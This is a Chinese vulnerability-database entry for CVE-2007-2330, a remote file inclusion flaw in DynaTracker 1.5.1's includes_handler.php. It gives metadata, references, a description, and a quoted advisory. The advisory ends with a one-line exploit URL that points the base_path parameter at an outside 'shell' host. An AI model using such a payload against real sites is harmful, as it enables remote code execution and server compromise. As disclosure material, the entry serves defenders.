DynaTracker 'includes_handler.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112789 漏洞类型 输入验证
发布时间 2007-04-25 更新时间 2007-04-27
CVE编号 CVE-2007-2330 CNNVD-ID CNNVD-200704-533
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/29912
https://cxsecurity.com/issue/WLB-2007040145
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-533
|漏洞详情
DynaTracker的includes_handler.php中存在PHP远程文件包含漏洞。远程攻击者可以借助base_path参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/23667/info
 
DynaTracker is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
 
DynaTracker 1.5.1 is reported vulnerable; other versions may also be affected. 

http://www.example.com/DynaTracker_v151/action.php?base_path=http://shell
|参考资料

来源:BUGTRAQ
名称:20070425DynaTracker&v151>>RFI
链接:http://www.securityfocus.com/archive/1/archive/1/466843/100/0/threaded
来源:OSVDB
名称:34160
链接:http://osvdb.org/34160
来源:OSVDB
名称:34159
链接:http://osvdb.org/34159
来源:XF
名称:dynatracker-basepath-file-include(33873)
链接:http://xforce.iss.net/xforce/xfdb/33873
来源:BID
名称:23667
链接:http://www.securityfocus.com/bid/23667
来源:SREASON
名称:2638
链接:http://securityreason.com/securityalert/2638